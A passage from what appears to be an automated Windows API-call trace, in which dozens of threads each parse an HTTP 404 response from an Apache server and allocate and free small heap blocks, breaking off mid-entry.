410 os_tid = 0x15cc [0256.696] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0256.697] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:43 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0256.697] GetProcessHeap () returned 0x6a0000 [0256.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0256.697] GetProcessHeap () returned 0x6a0000 [0256.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0256.697] GetProcessHeap () returned 0x6a0000 [0256.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9908 | out: hHeap=0x6a0000) returned 1 Thread: id = 411 os_tid = 0x15d0 [0256.946] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0256.946] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:43 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0256.946] GetProcessHeap () returned 0x6a0000 [0256.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0256.946] GetProcessHeap () returned 0x6a0000 [0256.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0256.946] GetProcessHeap () returned 0x6a0000 [0256.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9908 | out: hHeap=0x6a0000) returned 1 Thread: id = 412 os_tid = 0x15d4 [0257.214] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.214] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:44 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0257.219] GetProcessHeap () returned 0x6a0000 [0257.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea18 [0257.219] GetProcessHeap () returned 0x6a0000 [0257.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea18 | out: hHeap=0x6a0000) returned 1 [0257.219] GetProcessHeap () returned 0x6a0000 [0257.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9908 | out: hHeap=0x6a0000) returned 1 Thread: id = 413 os_tid = 0x15d8 [0257.445] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.445] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:44 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0257.445] GetProcessHeap () returned 0x6a0000 [0257.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea18 [0257.445] GetProcessHeap () returned 0x6a0000 [0257.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea18 | out: hHeap=0x6a0000) returned 1 [0257.445] GetProcessHeap () returned 0x6a0000 [0257.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9908 | out: hHeap=0x6a0000) returned 1 Thread: id = 414 os_tid = 0x15dc [0257.730] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.731] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:44 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0257.731] GetProcessHeap () returned 0x6a0000 [0257.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea18 [0257.731] GetProcessHeap () returned 0x6a0000 [0257.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea18 | out: hHeap=0x6a0000) returned 1 [0257.731] GetProcessHeap () returned 0x6a0000 [0257.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9908 | out: hHeap=0x6a0000) returned 1 Thread: id = 415 os_tid = 0x15e0 [0257.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.972] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:44 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0257.972] GetProcessHeap () returned 0x6a0000 [0257.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0257.972] GetProcessHeap () returned 0x6a0000 [0257.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0257.972] GetProcessHeap () returned 0x6a0000 [0257.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9908 | out: hHeap=0x6a0000) returned 1 Thread: id = 416 os_tid = 0x15e4 [0258.180] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.180] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:45 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0258.180] GetProcessHeap () returned 0x6a0000 [0258.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea18 [0258.181] GetProcessHeap () returned 0x6a0000 [0258.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea18 | out: hHeap=0x6a0000) returned 1 [0258.181] GetProcessHeap () returned 0x6a0000 [0258.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9908 | out: hHeap=0x6a0000) returned 1 Thread: id = 417 os_tid = 0x15e8 [0258.419] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.420] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:45 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0258.420] GetProcessHeap () returned 0x6a0000 [0258.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea18 [0258.420] GetProcessHeap () returned 0x6a0000 [0258.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea18 | out: hHeap=0x6a0000) returned 1 [0258.420] GetProcessHeap () returned 0x6a0000 [0258.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 418 os_tid = 0x15ec [0258.636] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.636] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:45 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0258.636] GetProcessHeap () returned 0x6a0000 [0258.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0258.636] GetProcessHeap () returned 0x6a0000 [0258.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0258.636] GetProcessHeap () returned 0x6a0000 [0258.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 419 os_tid = 0x15f0 [0258.849] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.850] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:45 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0258.850] GetProcessHeap () returned 0x6a0000 [0258.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0258.850] GetProcessHeap () returned 0x6a0000 [0258.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0258.850] GetProcessHeap () returned 0x6a0000 [0258.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 420 os_tid = 0x15f8 [0259.101] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.101] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:46 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0259.102] GetProcessHeap () returned 0x6a0000 [0259.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea18 [0259.102] GetProcessHeap () returned 0x6a0000 [0259.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea18 | out: hHeap=0x6a0000) returned 1 [0259.102] GetProcessHeap () returned 0x6a0000 [0259.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 421 os_tid = 0x1608 [0259.337] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.337] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:46 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0259.337] GetProcessHeap () returned 0x6a0000 [0259.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0259.337] GetProcessHeap () returned 0x6a0000 [0259.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0259.337] GetProcessHeap () returned 0x6a0000 [0259.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 422 os_tid = 0x160c [0259.592] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.592] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:46 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0259.592] GetProcessHeap () returned 0x6a0000 [0259.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be958 [0259.592] GetProcessHeap () returned 0x6a0000 [0259.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be958 | out: hHeap=0x6a0000) returned 1 [0259.592] GetProcessHeap () returned 0x6a0000 [0259.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 423 os_tid = 0x1610 [0259.792] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.792] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:46 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0259.792] GetProcessHeap () returned 0x6a0000 [0259.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be970 [0259.792] GetProcessHeap () returned 0x6a0000 [0259.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be970 | out: hHeap=0x6a0000) returned 1 [0259.792] GetProcessHeap () returned 0x6a0000 [0259.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 424 os_tid = 0x1618 [0260.115] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.116] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:47 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0260.116] GetProcessHeap () returned 0x6a0000 [0260.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be958 [0260.116] GetProcessHeap () returned 0x6a0000 [0260.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be958 | out: hHeap=0x6a0000) returned 1 [0260.116] GetProcessHeap () returned 0x6a0000 [0260.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 425 os_tid = 0x161c [0260.317] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.318] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:47 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0260.318] GetProcessHeap () returned 0x6a0000 [0260.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0260.318] GetProcessHeap () returned 0x6a0000 [0260.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0260.318] GetProcessHeap () returned 0x6a0000 [0260.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 426 os_tid = 0x1620 [0260.483] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.513] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:47 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0260.513] GetProcessHeap () returned 0x6a0000 [0260.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0260.513] GetProcessHeap () returned 0x6a0000 [0260.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0260.513] GetProcessHeap () returned 0x6a0000 [0260.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 427 os_tid = 0x1624 [0260.649] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.685] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:47 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0260.685] GetProcessHeap () returned 0x6a0000 [0260.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be898 [0260.685] GetProcessHeap () returned 0x6a0000 [0260.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be898 | out: hHeap=0x6a0000) returned 1 [0260.685] GetProcessHeap () returned 0x6a0000 [0260.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 428 os_tid = 0x1628 [0260.884] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.885] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:47 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0260.885] GetProcessHeap () returned 0x6a0000 [0260.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0260.885] GetProcessHeap () returned 0x6a0000 [0260.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0260.885] GetProcessHeap () returned 0x6a0000 [0260.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 Thread: id = 429 os_tid = 0x162c [0261.135] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.136] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0261.136] GetProcessHeap () returned 0x6a0000 [0261.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be958 [0261.136] GetProcessHeap () returned 0x6a0000 [0261.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be958 | out: hHeap=0x6a0000) returned 1 [0261.136] GetProcessHeap () returned 0x6a0000 [0261.137] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 Thread: id = 430 os_tid = 0x1630 [0261.360] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.361] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0261.361] GetProcessHeap () returned 0x6a0000 [0261.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be868 [0261.361] GetProcessHeap () returned 0x6a0000 [0261.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be868 | out: hHeap=0x6a0000) returned 1 [0261.361] GetProcessHeap () returned 0x6a0000 [0261.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 Thread: id = 431 os_tid = 0x1638 [0261.606] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.606] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0261.606] GetProcessHeap () returned 0x6a0000 [0261.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be958 [0261.606] GetProcessHeap () returned 0x6a0000 [0261.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be958 | out: hHeap=0x6a0000) returned 1 [0261.606] GetProcessHeap () returned 0x6a0000 [0261.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 Thread: id = 432 os_tid = 0x1644 [0261.784] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.784] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0261.784] GetProcessHeap () returned 0x6a0000 [0261.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea00 [0261.784] GetProcessHeap () returned 0x6a0000 [0261.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea00 | out: hHeap=0x6a0000) returned 1 [0261.785] GetProcessHeap () returned 0x6a0000 [0261.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 Thread: id = 433 os_tid = 0x1648 [0261.951] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.977] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:49 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0261.977] GetProcessHeap () returned 0x6a0000 [0261.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0261.977] GetProcessHeap () returned 0x6a0000 [0261.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0261.977] GetProcessHeap () returned 0x6a0000 [0261.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 Thread: id = 434 os_tid = 0x1654 [0262.241] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.241] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:49 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0262.241] GetProcessHeap () returned 0x6a0000 [0262.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be958 [0262.242] GetProcessHeap () returned 0x6a0000 [0262.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be958 | out: hHeap=0x6a0000) returned 1 [0262.242] GetProcessHeap () returned 0x6a0000 [0262.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 Thread: id = 435 os_tid = 0x165c [0262.469] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.470] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:49 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0262.470] GetProcessHeap () returned 0x6a0000 [0262.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be790 [0262.470] GetProcessHeap () returned 0x6a0000 [0262.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be790 | out: hHeap=0x6a0000) returned 1 [0262.470] GetProcessHeap () returned 0x6a0000 [0262.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 Thread: id = 436 os_tid = 0x1664 [0262.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.658] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:49 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0262.658] GetProcessHeap () returned 0x6a0000 [0262.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be790 [0262.658] GetProcessHeap () returned 0x6a0000 [0262.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be790 | out: hHeap=0x6a0000) returned 1 [0262.658] GetProcessHeap () returned 0x6a0000 [0262.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 Thread: id = 437 os_tid = 0x1668 [0262.988] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.988] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:49 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0262.988] GetProcessHeap () returned 0x6a0000 [0262.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be958 [0262.988] GetProcessHeap () returned 0x6a0000 [0262.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be958 | out: hHeap=0x6a0000) returned 1 [0262.989] GetProcessHeap () returned 0x6a0000 [0262.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 Thread: id = 438 os_tid = 0x1670 [0263.266] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.267] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:50 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0263.267] GetProcessHeap () returned 0x6a0000 [0263.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0263.267] GetProcessHeap () returned 0x6a0000 [0263.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0263.267] GetProcessHeap () returned 0x6a0000 [0263.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 Thread: id = 439 os_tid = 0x167c [0263.461] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.461] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:50 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0263.461] GetProcessHeap () returned 0x6a0000 [0263.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0263.462] GetProcessHeap () returned 0x6a0000 [0263.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0263.462] GetProcessHeap () returned 0x6a0000 [0263.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 Thread: id = 440 os_tid = 0x1680 [0263.676] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.677] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:50 GMT\r\nServer: 